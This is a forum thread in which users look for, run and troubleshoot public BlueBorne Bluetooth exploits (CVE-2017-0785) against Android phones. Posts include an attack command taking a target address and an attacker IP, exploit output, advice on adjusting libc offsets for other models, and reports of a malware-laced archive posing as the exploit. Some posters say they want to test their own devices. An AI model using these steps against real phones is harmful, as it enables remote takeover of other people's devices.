Well, the bluetooth is f#cked.
There will be a chance that we get the script on Github or in Kali repo to test it on our home devices?
Maybe somone will try to make a quick script or exploit for Metasploit for petesting?
What are your Toughts on this?
52 Responses
There will be an article coming out shortly on BlueBorne, however, I was unable to actually find any implementations online. That doesn't mean they aren't out there, but I couldn't find them if you do please let me know.
If you want to try working on them yourself the white paper should have most of what you need to get started.
I would totaly make it if i had some coding skills.
It would be convinient to have this in kali as a separate tool just to chceck my home stuff and check the vulnerability level and what i can do with this.
I found something like this on github, but i don't really know what it is.
Maybe somone will tell me, what does this .java files do: https://github.com/mailinneberg/BlueBorne
That GitHub link seems to be code to detect if the device is vulnerable to BlueBorne.
If you read the white paper , it mentions on page 14 that they will be releasing the testing framework,along side the exploit code for CVE-2017-1000251. Also am sure some rainman out there will turns the vulnerabilities into exploits on python or ruby and bam! I did notice in their demo they used a python script so its just a matter of time now.
Thanks for pointing that out, I somehow missed it! Hopefully, they release it soon.
Thanks for opinion!
I would really want to check this exploit to make sure that my and my family devices are safe. If not, with this exploit, i would know how to protect them from attack.
For now on, bluetooth is off :)
Fingers crossed for quick exploit release
What devices do you have? Most of them are patched now.
few android phones (asus and xiaomi mostly) and few winodws devices (windows 7 and 10) and bunch of smartwatches (mainly pebble)
According to the release page both the android and windows devices have been patched so as long as they are updated you should be fine. I don't think Pebble was affected by Blueborne.
The Script will actually be in Python.
Well, somone on Github posted something like this:
CVE-2017-0785
It has 250 stars on github so something is going on with this script.
I tried it but when i set target on my phone, it shows only the first line in the script. Nothing else. I need to study this one.
Maybe someone will know what this is about?
@edit: Well, i know for sure that this thing grabs bluetooth hashed Packets of activities that are on the targeted device. I will try to explore this more.
Does anyone have the Demo of this exploit from ARMIS site? I would like to look in it, but it is send only to companies. ARMIS site
Hey guys! I wrote an article on Blueborne CVE-2017-0785 Android memory leak, check it out if your interested. BTW love Nullbytes and Ive learned alot on here, even wrote some honeypot articles on here, just feel I needed to make my own site with things I was messing around with that I can have control of, anyways hacker brothers enjoy! If you like some ideas feel free to share them!
http://ethicalredteam.com/pages/CVE-2017-0785.html
This article is great! Much usefull information!
I think somone on github did a script for every android vulnerability:
Littl_Tools
I will check them if i will have some free time.
You can get the working script from
here: cnhv.co/46p3
and the password here: cnhv.co/46pf
Would be great to not have this on CoinHive.
My computer is realy slow for this.
Really, the password is a riddle?
@MARK MUSK idk if you uploaded this files or you just got the links, but why not upload the password to the file? Cant figure it out what the solution of the riddle should be?!
I got this file from coinhive: Deleted - Mallware
The password - Riddle is:
"Well, password is: BlueBorne.
But is not exactly BlueBorne, Maybe a variant of the worD BlueBorne.
Maybe there is a clue in this file.
Maybe."
I will try to crack this while i get home. Meanwhile maybe one of you will try to open it.
@Edit: I really start to belive that this is just a troll.
Yes was thinking the same, tryied it a few times, but cant find an clue on what the password should be...its annoying...
one clue I can see is that the word "worD" is written differently, D is in caps, so I've tried
bluebornE
BluebornE
BlueBornE
BluEBornE
BluEborne
..
.
and many other, still no Luck.
Blueborne.7z file is malware!
I have deleted it. Search continues.
Nothing found on virus total:
https://www.virustotal.com/#/file/90d5d0ed72d0c1e3f4f46cd9e070d7336f0714b5beced935a947a8f28d959608/detection
But I think is more like a troll, with the password riddle, nobody could solve.
Try to download and open it. May be you will see.
any luck with blueborn ?
Nothing so far.
There is a PoC script on github. But only for Pixel and nexus 5.
How to change it for another phones?
https://github.com/Alfa100001/-CVE-2017-0785-BlueBorne-PoC
What about this?
Armis put the code for Android on GitHub.
Neat! I need to try it out.
@edit: Does anyone knows how to change the script to work for desired phone? Armis released only for pixel and nexus but they told, that it can be easily altered for other phones. What credentials i need to put in script?
I don't know the exact details yet but from just glancing at the code it seems to me you just need to change two variables in the doit.py file LIBCTEXTSTSTEM_OFFSET and LIBCSOMEBLX_OFFSET I don't know what they should be set to for particular phones though.
Minus of this script is, that it won't work on raspberry pi because PWN won't work with 32-bit systems.
Any luck with how to edit the code for oher systems?
I was thinking, is there any possible way to rewrite this to an exploit for Metasploit Console? That would eliminate the PWN minus on raspberry
Not work for my honor6x.
I have tried https://github.com/ArmisSecurity/blueborne and change libc.so and bluetooth.default.so to the same version list in doit.py(copy from Nexus 5X 7.1.2 patch level Aug/July 2017 rom/system) to my phone.
I rooted my phone so I can copy the file to my system folder.
Translate it and read.
https://jesux.es/exploiting/blueborne-android-6.0.1/
JAVEI WANG how exactly did you changed it.
It seams not to be simple.
I rooted my phone and startup the TWRP before phone startup.
TWRP provide load system driver with write access and powerful terminal.
So replace is no problem.
Great thanks for your https://jesux.es/exploiting/blueborne-android-6.0.1/ I will read it ASAP.
Also I want to patch/fix blueborne for my phone but stuck on build bluedroid alone using TWRP. It's not so easy to study Android.
Armis said it can be easily edited for other android versions. There is to much variables for this process.
yes,https://jesux.es/exploiting/blueborne-android-6.0.1/ too complex and hard to follow.
will read it try to follow again.
English version
https://jesux.es/exploiting/blueborne-android-6.0.1-english/
@NAVY:
May i ask question about peda-arm
I using termux for gdb with my android phone.
But this gdb not support python script in Termux
How you use peda-arm in you environment?
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
/data/data/com.termux/files/home/.gdbinit:1: Error in sourced command file:
:8: Error in sourced command file:
Undefined command: "from". Try "help".
(gdb)
@Navy
I solved the peda-arm problem by recompile GDB with python support.
Another questionL
How you get the X value for
likelysomelibcblxoffset = resultXX
likelysomebluetoothdefaultglobalvaroffset = resultXX
May be it is tuple index
0 1 2 3 4 5 6 7 8 9 10
-10-9-8-7-6-5-4-3-2-1
Up to down or down to up
I don't know yet.
Hello everyone! has anyone managed to exploit this vulnerability?
I tried this repository that seems official:
https://github.com/ArmisSecurity/blueborne
from the android folder I launched:
sudo python2 doit.py hci0 <target-bdaddr> <attacker-ip>
to my vulnerable smartphone and this is the output:
Not connected.
* Pwn attempt 0:
* Set hci0 to new rand BDADDR XX:XX:XX:XX:XX:XX
libcbase: 0xfffe5714, bssbase: 0xe768fa7c
libcbase: 0xfffe5714, bssbase: 0xe768fa7c
libcbase: 0xfffe5714, bssbase: 0xe768fc44
libcbase: 0xfffe5714, bssbase: 0xe768fc44
libcbase: 0xfffe5714, bssbase: 0xe768fca4
Traceback (most recent call last):
File "doit.py", line 202, in <module>
main(*sys.argv1:)
File "doit.py", line 181, in main
assert False, "Memory doesn't seem to have leaked as expected. Wrong .so versions?"
AssertionError: Memory doesn't seem to have leaked as expected. Wrong .so versions?
How to solve tha doit.py problem
Try to follow this- https://jesux.es/exploiting/blueborne-android-6.0.1-english/
Anyone had any luck in configuring this script for yours smartphone? Just curious
Hi, HOS7
So you succeeded in configuring this script?
I managed to do it, but i can't get 4 base addresses.
@CHEN TIM
EDIT: Well i had the same problem with you and i figure out what to do.You must do command :adb shell first(apt-get install adb if you dont have) and u must have connected your mobile phone with your kali linux.
Then you do the ps |grep blue and u follow the orders.But to see the process map you must have a rooted phone.(he writes about that in the begining)
Hi everyone I wanted to know if you could help me, when I launch the attack with the command:
root@#python2 doit.py hci0 XX.XX.XX.XX.XX.XX <my ip adress>
Blueborne remains blocked on this:
Not connected.
* Pwn attempt 0:
Unsupported manufacturer
* Set hci0 to new rand BDADDR XX.XX.XX.XX.XX.XX
May be your Bluetooth adapter is unsupported.
Share Your Thoughts